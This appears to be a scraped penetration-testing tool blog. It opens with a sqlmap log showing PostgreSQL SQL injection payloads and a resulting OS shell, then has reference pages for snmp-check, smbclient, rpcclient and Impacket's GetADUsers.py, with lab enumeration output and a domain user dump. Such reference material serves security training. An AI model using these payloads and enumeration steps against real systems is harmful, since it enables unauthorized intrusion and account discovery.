[22:05:11] [INFO] using '/home/kali/.local/share/sqlmap/output/results-03272022_1005pm.csv' as the CSV results file in multiple targets mode
[22:05:11] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[22:05:11] [WARNING] if the problem persists please check that the provided target URL is reachable. In case that it is, you can try to rerun with switch '--random-agent' and/or proxy switches ('--proxy', '--proxy-file'...)
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (GET)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: search=UIxO' AND (SELECT (CASE WHEN (9562=9562) THEN NULL ELSE CAST((CHR(66)||CHR(105)||CHR(81)||CHR(98)) AS NUMERIC) END)) IS NULL-- ERQn
 
    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: search=UIxO' AND 6624=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (6624=6624) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)) AS NUMERIC)-- McGu
 
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=UIxO';SELECT PG_SLEEP(5)--
 
    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: search=UIxO' AND 3799=(SELECT 3799 FROM PG_SLEEP(5))-- oRIu
---
do you want to exploit this SQL injection? [Y/n]
[22:05:21] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[22:05:21] [INFO] fingerprinting the back-end DBMS operating system
[22:05:22] [INFO] the back-end DBMS operating system is Linux
[22:05:22] [INFO] testing if current user is DBA
[22:05:22] [INFO] retrieved: '1'
[22:05:22] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
[22:05:22] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a]
[22:05:33] [INFO] retrieved: 'postgres'
command standard output:
---
p
o
s
t
g
r
e
s
---
os-shell>

Blog Posts

snmp-check

Description

Snmpcheck is an open source tool distributed under GPL license. Its goal is to automate the process of gathering information of any devices with SNMP protocol support (Windows, Unix-like, network appliances, printers…). Like snmpwalk, snmpcheck allows you to enumerate the SNMP devices and places the output in a very human readable friendly format. It could be useful for penetration testing or systems monitoring.

PlatformLinux
AuthorMatteo Cantoni
LicenseGPLv3
URLhttp://www.nothink.org/codes/snmpcheck/

Usage

snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
 
 Usage: snmp-check [OPTIONS] <target IP address>
 
  -p --port        : SNMP port. Default port is 161;
  -c --community   : SNMP community. Default is public;
  -v --version     : SNMP version (1,2c). Default is 1;
 
  -w --write       : detect write access (separate action by enumeration);
 
  -d --disable_tcp : disable TCP connections enumeration!
  -t --timeout     : timeout in seconds. Default is 5;
  -r --retries     : request retries. Default is 1;
  -i --info        : show script version;
  -h --help        : show help menu;

Examples

snmp-check x.x.x.x

The following output shows snmp-check run with default settings.

└─# snmp-check 192.168.168.42
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
 
[+] Try to connect to 192.168.168.42:161 using SNMPv1 and community 'public'
 
[*] System information:
 
  Host IP address               : 192.168.168.42
  Hostname                      : 0xbabe.local
  Description                   : Linux 0xbabe.local 2.6.8-4-386 #1 Wed Feb 20 06:15:54 UTC 2008 i686
  Contact                       : Root <root@localhost> (configure /etc/snmp/snmpd.local.conf)
  Location                      : Unknown (configure /etc/snmp/snmpd.local.conf)
  Uptime snmp                   : 02:27:01.75
  Uptime system                 : 02:26:28.35
  System date                   : 2021-2-3 02:57:09.0
 
[*] Network information:
 
  IP forwarding enabled         : no
  Default TTL                   : 64
  TCP segments received         : 4004
  TCP segments sent             : 2614
  TCP segments retrans          : 0
  Input datagrams               : 4245
  Delivered datagrams           : 4245
  Output datagrams              : 2854
 
[*] Network interfaces:
 
  Interface                     : [ up ] lo
  Id                            : 1
  Mac Address                   : :::::
  Type                          : softwareLoopback
  Speed                         : 10 Mbps
  MTU                           : 16436
  In octets                     : 264
  Out octets                    : 264
 
  Interface                     : [ up ] eth0
  Id                            : 2
  Mac Address                   : 00:50:56:bf:a3:08
  Type                          : ethernet-csmacd
  Speed                         : 100 Mbps
  MTU                           : 1500
  In octets                     : 3325200
  Out octets                    : 234338
 
  Interface                     : [ down ] sit0
  Id                            : 3
  Mac Address                   : 00:00:00:00:a3:08
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 1480
  In octets                     : 0
  Out octets                    : 0
 
 
[*] Network IP:
 
  Id                    IP Address            Netmask               Broadcast          
  1                     127.0.0.1             255.0.0.0             0                  
  2                     192.168.168.42        255.255.255.0         1                  
 
[*] Routing information:
 
  Destination           Next hop              Mask                  Metric             
  0.0.0.0               192.168.168.254       0.0.0.0               1                  
  192.168.168.0         0.0.0.0               255.255.255.0         0                  
 
[*] TCP connections and listening ports:
 
  Local address         Local port            Remote address        Remote port           State              
  0.0.0.0               25                    0.0.0.0               0                     listen             
  0.0.0.0               80                    0.0.0.0               0                     listen             
  0.0.0.0               139                   0.0.0.0               0                     listen             
  0.0.0.0               199                   0.0.0.0               0                     listen             
  0.0.0.0               445                   0.0.0.0               0                     listen             
 
[*] Listening UDP ports:
 
  Local address         Local port         
  0.0.0.0               137                
  0.0.0.0               138                
  0.0.0.0               161                
  192.168.168.42        137                
  192.168.168.42        138                
 
[*] Processes:
 
  Id                    Status                Name                  Path                  Parameters         
  1                     runnable              init                  init [2]                                 
  2                     runnable              ksoftirqd/0           ksoftirqd/0                              
  3                     runnable              events/0              events/0                                 
  4                     runnable              khelper               khelper                                  
  5                     runnable              kacpid                kacpid                                   
  99                    runnable              kblockd/0             kblockd/0                                
  109                   runnable              pdflush               pdflush                                  
  110                   runnable              pdflush               pdflush                                  
  111                   runnable              kswapd0               kswapd0                                  
  112                   runnable              aio/0                 aio/0                                    
  255                   runnable              kseriod               kseriod                                  
  276                   runnable              scsi_eh_0             scsi_eh_0                                
  284                   runnable              khubd                 khubd                                    
  348                   runnable              shpchpd_event         shpchpd_event                            
  380                   runnable              kjournald             kjournald                                
  935                   runnable              vmmemctl              vmmemctl                                 
  1177                  runnable              vmtoolsd              /usr/sbin/vmtoolsd                       
  3772                  running               syslogd               /sbin/syslogd                            
  3775                  runnable              klogd                 /sbin/klogd                              
  3780                  runnable              clamd                 /usr/local/sbin/clamd                     
  3782                  runnable              clamav-milter         /usr/local/sbin/clamav-milter  --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl
  3791                  runnable              inetd                 /usr/sbin/inetd                          
  3795                  runnable              nmbd                  /usr/sbin/nmbd        -D                 
  3797                  runnable              smbd                  /usr/sbin/smbd        -D                 
  3801                  running               snmpd                 /usr/sbin/snmpd       -Lsd -Lf /dev/null -p /var/run/snmpd.pid
  3807                  runnable              sshd                  /usr/sbin/sshd                           
  3822                  runnable              smbd                  /usr/sbin/smbd        -D                 
  3886                  runnable              sendmail-mta          sendmail: MTA: accepting connections                     
  3900                  runnable              atd                   /usr/sbin/atd                            
  3903                  runnable              cron                  /usr/sbin/cron                           
  3910                  runnable              apache                /usr/sbin/apache                         
  3911                  runnable              apache                /usr/sbin/apache                         
  3912                  runnable              apache                /usr/sbin/apache                         
  3913                  runnable              apache                /usr/sbin/apache                         
  3914                  runnable              apache                /usr/sbin/apache                         
  3915                  runnable              apache                /usr/sbin/apache                         
  3926                  runnable              getty                 /sbin/getty           38400 tty1         
  3928                  runnable              getty                 /sbin/getty           38400 tty2         
  3929                  runnable              getty                 /sbin/getty           38400 tty3         
  3930                  runnable              getty                 /sbin/getty           38400 tty4         
  3931                  runnable              getty                 /sbin/getty           38400 tty5         
  3932                  runnable              getty                 /sbin/getty           38400 tty6         
  4022                  runnable              apache                /usr/sbin/apache                         
  4032                  runnable              apache                /usr/sbin/apache                         
 
[*] Storage information:
 
  Description                   : ["Real Memory"]
  Device id                     : [#<SNMP::Integer:0x00005603d60ea328 @value=2>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x00005603d60e8640 @value=1024>]
  Memory size                   : 250.82 MB
  Memory used                   : 123.28 MB
 
  Description                   : ["Swap Space"]
  Device id                     : [#<SNMP::Integer:0x00005603d60e3190 @value=3>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x00005603d60e1458 @value=1024>]
  Memory size                   : 203.91 MB
  Memory used                   : 0 bytes
 
  Description                   : ["/"]
  Device id                     : [#<SNMP::Integer:0x00005603d60dc0c0 @value=4>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x00005603d60da3b0 @value=4096>]
  Memory size                   : 3.74 GB
  Memory used                   : 765.66 MB
 
  Description                   : ["/sys"]
  Device id                     : [#<SNMP::Integer:0x00005603d6030f40 @value=5>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x00005603d602f258 @value=4096>]
  Memory size                   : 0 bytes
  Memory used                   : 0 bytes
 
 
[*] File system information:
 
  Index                         : 1
  Mount point                   : /
  Remote mount point            : -
  Access                        : 1
  Bootable                      : 1
 
[*] Device information:
 
  Id                    Type                  Status                Descr              
  768                   unknown               unknown               AuthenticAMD: AMD EPYC 7371 16-Core Processor
  1025                  unknown               running               network interface lo
  1026                  unknown               running               network interface eth0
  1027                  unknown               down                  network interface sit0
  1536                  unknown               unknown               VMware Virtual IDE CDROM Drive
  1552                  unknown               unknown               SCSI disk (/dev/sda)
  3072                  unknown               unknown               Guessing that there's a floating point co-processor

Blog Posts

smbclient

Description

smbclient is a client that can ‘talk’ to an SMB/CIFS server. It offers an interface similar to that of the ftp program. Operations include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on.

Usage

Tool Usage:

Usage: smbclient service <password>
  -R, --name-resolve=NAME-RESOLVE-ORDER     Use these name resolution services only
  -M, --message=HOST                        Send message
  -I, --ip-address=IP                       Use this IP to connect to
  -E, --stderr                              Write messages to stderr instead of stdout
  -L, --list=HOST                           Get a list of shares available on a host
  -m, --max-protocol=LEVEL                  Set the max protocol level
  -T, --tar=<c|x>IXFvgbNan                  Command line tar
  -D, --directory=DIR                       Start from directory
  -c, --command=STRING                      Execute semicolon separated commands
  -b, --send-buffer=BYTES                   Changes the transmit/send buffer
  -t, --timeout=SECONDS                     Changes the per-operation timeout
  -p, --port=PORT                           Port to connect to
  -g, --grepable                            Produce grepable output
  -q, --quiet                               Suppress help message
  -B, --browse                              Browse SMB servers using DNS
 
Help options:
  -?, --help                                Show this help message
      --usage                               Display brief usage message
 
Common samba options:
  -d, --debuglevel=DEBUGLEVEL               Set debug level
  -s, --configfile=CONFIGFILE               Use alternate configuration file
  -l, --log-basename=LOGFILEBASE            Base name for log files
  -V, --version                             Print version
      --option=name=value                   Set smb.conf option from command line
 
Connection options:
  -O, --socket-options=SOCKETOPTIONS        socket options to use
  -n, --netbiosname=NETBIOSNAME             Primary netbios name
  -W, --workgroup=WORKGROUP                 Set the workgroup name
  -i, --scope=SCOPE                         Use this Netbios scope
 
Authentication options:
  -U, --user=USERNAME                       Set the network username
  -N, --no-pass                             Don't ask for a password
  -k, --kerberos                            Use kerberos (active directory) authentication
  -A, --authentication-file=FILE            Get the credentials from a file
  -S, --signing=on|off|required             Set the client signing state
  -P, --machine-pass                        Use stored machine account password
  -e, --encrypt                             Encrypt SMB transport
  -C, --use-ccache                          Use the winbind ccache for authentication
      --pw-nt-hash                          The supplied password is the NT hash

SMB Shell Usage:

?              allinfo        altname        archive        backup        
blocksize      cancel         case_sensitive cd             chmod         
chown          close          del            deltree        dir           
du             echo           exit           get            getfacl       
geteas         hardlink       help           history        iosize        
lcd            link           lock           lowercase      ls            
l              mask           md             mget           mkdir         
more           mput           newer          notify         open          
posix          posix_encrypt  posix_open     posix_mkdir    posix_rmdir   
posix_unlink   posix_whoami   print          prompt         put           
pwd            q              queue          quit           readlink      
rd             recurse        reget          rename         reput         
rm             rmdir          showacls       setea          setmode       
scopy          stat           symlink        tar            tarmode       
timeout        translate      unlock         volume         vuid          
wdel           logon          listconnect    showconnect    tcon          
tdis           tid            utimes         logoff         ..            
!

Examples

smbclient -L <ip> -U <user>

This command will establish an SMB session with the server and list the shares.

smbclient \\\\<ip>\\<share> [password]

This will connect to the remote share and return an interactive smb prompt.

└──╼ [★]$ smbclient \\\\10.129.152.222\\WorkShares
Enter WORKGROUP\htb-403knowledge's password:
Try "help" to get a list of possible commands.
smb: \>

Blog Posts

rpcclient

Description

rpcclient is a utility initially developed to test MS-RPC functionality in Samba itself. It has undergone several stages of development and stability. Many system administrators have now written scripts around it to manage Windows NT clients from their UNIX workstation.

Usage

Usage: rpcclient [OPTION...] <server>
Options:
  -c, --command=COMMANDS                 Execute semicolon separated cmds
  -I, --dest-ip=IP                       Specify destination IP address
  -p, --port=PORT                        Specify port number
 
Help options:
  -?, --help                             Show this help message
      --usage                            Display brief usage message
 
Common samba options:
  -d, --debuglevel=DEBUGLEVEL            Set debug level
  -s, --configfile=CONFIGFILE            Use alternate configuration file
  -l, --log-basename=LOGFILEBASE         Base name for log files
  -V, --version                          Print version
      --option=name=value                Set smb.conf option from command line
 
Connection options:
  -O, --socket-options=SOCKETOPTIONS     socket options to use
  -n, --netbiosname=NETBIOSNAME          Primary netbios name
  -W, --workgroup=WORKGROUP              Set the workgroup name
  -i, --scope=SCOPE                      Use this Netbios scope
 
Authentication options:
  -U, --user=USERNAME                    Set the network username
  -N, --no-pass                          Don't ask for a password
  -k, --kerberos                         Use kerberos (active directory) authentication
  -A, --authentication-file=FILE         Get the credentials from a file
  -S, --signing=on|off|required          Set the client signing state
  -P, --machine-pass                     Use stored machine account password
  -e, --encrypt                          Encrypt SMB transport
  -C, --use-ccache                       Use the winbind ccache for authentication
      --pw-nt-hash                       The supplied password is the NT hash

Examples

rpcclient <ip> -U <user>

This command establishes an RPC session with the server.

 enum<TabTab>

From the rpc prompt, you can tab out commands such as the enum* commands.

Blog Posts

GetADUsers.py

Description

Part of the Impacket network tool suite – enumerates all the AD users provided you have valid creds.

Usage

Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
 
usage: GetADUsers.py [-h] [-user username] [-all] [-ts] [-debug]
                     [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
                     [-dc-ip ip address]
                     target
 
Queries target domain for users data
 
positional arguments:
  target                domain/username[:password]
 
optional arguments:
  -h, --help            show this help message and exit
  -user username        Requests data for specific user
  -all                  Return all users, including those with no email
                        addresses and disabled accounts. When used with -user
                        it will return user's info even if the account is
                        disabled
  -ts                   Adds timestamp to every logging output
  -debug                Turn DEBUG output ON
 
authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from
                        ccache file (KRB5CCNAME) based on target parameters.
                        If valid credentials cannot be found, it will use the
                        ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256
                        bits)
  -dc-ip ip address     IP Address of the domain controller. If ommited it use
                        the domain part (FQDN) specified in the target
                        parameter

Examples

 GetADUsers.py hiboxy.com/bgreen:Password1 -dc-ip x.x.x.x -all | tee /tmp/adusers.txt

This command will enumerate all users in the hiboxy domain using the creds for bgreen.

Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
 
[*] Querying 10.130.10.4 for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator 2022-03-14 14:24:35.183246 2022-03-14 14:24:39.485072
Guest <never> <never>
SROCAdmin 2022-03-14 14:24:43.164622 <never>
krbtgt 2022-03-14 14:31:12.537996 <never>
SVC_SQLService SVC_SQLService@hiboxy.com 2022-03-14 14:32:16.637564 <never>
SVC_SQLService2 2022-03-14 14:32:16.778834 <never>
krosterman 2022-03-14 14:32:16.841622 <never>
smorgan smorgan@hiboxy.com 2022-03-14 14:32:16.904391 <never>
tduncan tduncan@hiboxy.com 2022-03-14 14:32:16.951489 2022-03-14 14:36:23.957238
antivirus 2022-03-14 14:32:17.861892 <never>
aallen 2022-03-14 14:32:17.940372 <never>
aalvarado 2022-03-14 14:32:18.018868 <never>
abaird 2022-03-14 14:32:18.097351 <never>
...
wortega 2022-03-14 14:32:58.110061 <never>
wrobinson 2022-03-14 14:32:58.188474 <never>
wstanley 2022-03-14 14:32:58.251129 <never>
wwade 2022-03-14 14:32:58.329487 <never>
wwilson 2022-03-14 14:32:58.392172 <never>
zclayton 2022-03-14 14:32:58.470533 <never>
$VJ1000-O3GM981V807M <never> <never>
SM_aaa538fcd9a742de9 SystemMailbox{1f05a927-b919-458d-bebd-92c52421d9be}@hiboxy.com <never> <never>
SM_92d45bee00ee49769 SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}@hiboxy.com <never> <never>
SM_1f4403d8339543fcb SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@hiboxy.com <never> <never>
SM_54e3d4f14fe84c84a DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}@hiboxy.com <never> <never>
SM_035c725ae06c4cf38 Migration.8f3e7716-2011-43e4-96b1-aba62d229136@hiboxy.com <never> <never>
SM_fbadcdb332e74005a FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@hiboxy.com <never> <never>
SM_f804d6dd51144fc5a SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}@hiboxy.com <never> <never>
SM_ea5a510e6bfd4c758 SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}@hiboxy.com <never> <never>
SM_76b5d049aad445e4a SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}@hiboxy.com <never> <never>
HealthMailboxf81d76d HealthMailboxf81d76db0dbd441ba35044828baa42e7@hiboxy.com 2022-03-14 15:16:49.293057 2022-03-15 23:54:55.305462
HealthMailboxd31f130 HealthMailboxd31f130f2c6748c0a6f57fcfb3beec46@hiboxy.com 2022-03-14 15:16:54.265986 2022-03-15 21:43:19.596318

Blog Posts